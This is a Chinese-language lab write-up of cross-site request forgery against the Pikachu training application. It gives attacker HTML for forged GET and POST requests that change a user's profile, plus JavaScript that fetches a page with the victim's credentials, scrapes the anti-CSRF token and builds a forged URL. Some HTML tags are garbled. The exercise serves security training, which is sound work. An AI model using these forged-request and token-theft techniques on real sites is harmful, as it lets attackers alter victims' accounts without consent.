w28pikachu-csrf实例

pikachu-csrf实例

get级别

这里需要同时修改性别、手机、住址、邮箱。

写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        a>
    body>
html>

点击"pikachu-csrf-get"文字后，跳转到pikachu的csrf(get)界面，展示修改后的界面。

post级别

这里post请求，需要通过表单提交。
写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        a>
    br>
    <form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
        <input id="sex" type="text" name="sex" value="5" />
        <input id="phonenum" type="text" name="phonenum" value="5" />
        <input id="add" type="text" name="add" value="5" />
        <input id="email" type="text" name="email" value="5" />
        <input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
    form>
    body>
    
html>

点击"pikachu-csrf-post"文字后，跳转到pikachu的csrf(post)界面，展示修改后的界面。

token级别

这里get请求+token。
写一个简单的html文件，里面get请求拼接token，代码如下：

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        </a>
    </br>
    <form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
        <input id="sex" type="text" name="sex" value="5" />
        <input id="phonenum" type="text" name="phonenum" value="5" />
        <input id="add" type="text" name="add" value="5" />
        <input id="email" type="text" name="email" value="5" />
        <input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
    </form>
    </br>
    <a  href="javascript:void(0);" onclick="initJS()">
        pikachu-csrf-token
    </a>
    </body>
    <script >
        function initJS(){
            
            var theUrl = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php';
            if(window.XMLHttpRequest) {
                xmlhttp = new XMLHttpRequest();
            }else{
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            }
            var count = 0;
            xmlhttp.withCredentials = true;
            xmlhttp.onreadystatechange=function(){
                if(xmlhttp.readyState ==4 && xmlhttp.status==200)
                {
                    var text = xmlhttp.responseText;

                    // 创建一个临时的 div 元素，并将 HTML 字符串设置为其 innerHTML  
                    var tempDiv = document.createElement('div');  
                    tempDiv.innerHTML = text;  
                    
                    // 从临时 div 中查找具有 name 属性为 "token" 的输入元素  
                    var tokenInput = tempDiv.querySelector('input[name="token"]');  
            
                    var token = tokenInput.value;  
                    console.log('Token Value:', token); // 在控制台输出 token 的值 
                    console.log('count',count);
                    var new_url = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex=7&phonenum=7&add=7&email=7&token='+token+'&submit=submit';
                    console.log('newurl',new_url);        
                }
            };
            xmlhttp.open("GET",theUrl,false);
            xmlhttp.send();
        }
    </script>
    
</html>

点击"pikachu-csrf-token"文字后，在控制台中查看newurl，并复制下来输入到浏览器中。


刷新csrf token，展示了修改后的信息。

破解成功